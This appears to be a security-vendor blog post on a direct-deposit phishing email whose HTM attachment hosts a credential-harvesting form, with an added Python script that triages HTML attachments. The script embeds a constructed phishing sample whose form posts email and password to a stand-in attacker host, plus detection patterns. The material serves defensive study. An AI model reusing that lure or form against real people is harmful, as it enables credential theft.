Direct deposit is a great convenience for businesses and individuals.
It's also a great way to launch a scam.
This attack, which bypassed Advanced Threat Protection (ATP), impersonates a direct deposit notification, something many employees expect to receive on payday.
The email carries an HTM attachment that holds the payload: the HTML that puts the victim in front of the credential-harvesting platform. In the last month, Avanan has seen 1.2 million HTM or HTML email attachments, and roughly 1.1 million of those were clean. That tells us end-users are used to seeing this file type and are likely to trust it enough to download and open it.
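Because the phishing page ships inside the attachment rather than behind a link in the message body, a practical defensive check is to open HTM/HTML attachments statically and look for the markers of a credential-harvesting form. The script below is an added example, not Avanan's code or tooling; the sample message, the sender and host names (`example-hr.invalid`, `collector.attacker.invalid`) and the heuristics are all constructed for the demo and are illustrative rather than exhaustive.

```python
"""Static triage of HTM/HTML e-mail attachments for credential-harvesting
indicators. Added example (not Avanan's code); the message below is constructed
for this demo and the indicator list is illustrative, not exhaustive."""
import base64
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample: a fake "direct deposit" notice whose HTM attachment
# renders a login form that posts the password to an attacker-controlled host.
SAMPLE_EML = b"""\
From: payroll@example-hr.invalid
To: employee@example.invalid
Subject: Direct Deposit Notification
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your direct deposit statement is attached.
--b1
Content-Type: text/html; name="DirectDeposit.htm"
Content-Disposition: attachment; filename="DirectDeposit.htm"
Content-Transfer-Encoding: base64

""" + base64.b64encode(b"""<html><body>
<form method="POST" action="https://collector.attacker.invalid/login.php">
Email: <input type="text" name="user">
Password: <input type="password" name="pass">
<input type="submit" value="View Statement">
</form></body></html>""") + b"""
--b1--
"""


class HarvestIndicators(HTMLParser):
    """Collects password fields, form targets and redirect hints from HTML."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.redirects = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.redirects.append("meta refresh: " + a.get("content", ""))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw text.
        if self._in_script and re.search(
                r"location\.(href|replace)|window\.open|atob\(", data):
            self.redirects.append("script: " + data.strip()[:60])


def triage_attachment(filename, html):
    """Return a verdict dict for one HTML attachment body."""
    p = HarvestIndicators()
    p.feed(html)
    reasons = []
    if p.password_inputs:
        reasons.append(f"{p.password_inputs} password field(s)")
    for action in p.form_actions:
        if re.match(r"https?://", action, re.I):
            reasons.append(f"form posts to external host {action}")
    reasons.extend(p.redirects)
    return {"filename": filename, "suspicious": bool(reasons), "reasons": reasons}


def triage_message(raw_bytes):
    """Parse a raw RFC 5322 message and triage every .htm/.html attachment."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    results = []
    for part in msg.walk():
        name = part.get_filename() or ""
        if not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_payload(decode=True) or b""   # undoes base64 CTE
        results.append(triage_attachment(name, body.decode("utf-8", "replace")))
    return results


if __name__ == "__main__":
    for verdict in triage_message(SAMPLE_EML):
        print(verdict)
```

Treat the output as a triage signal, not a verdict: with over a million clean HTM/HTML attachments a month in the numbers above, a rule that blocks every HTML attachment with a form will generate noise, so the useful combination is a password field plus a form action or script redirect that leaves the local file for an external host.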
Here's what the HTM attachment looks like: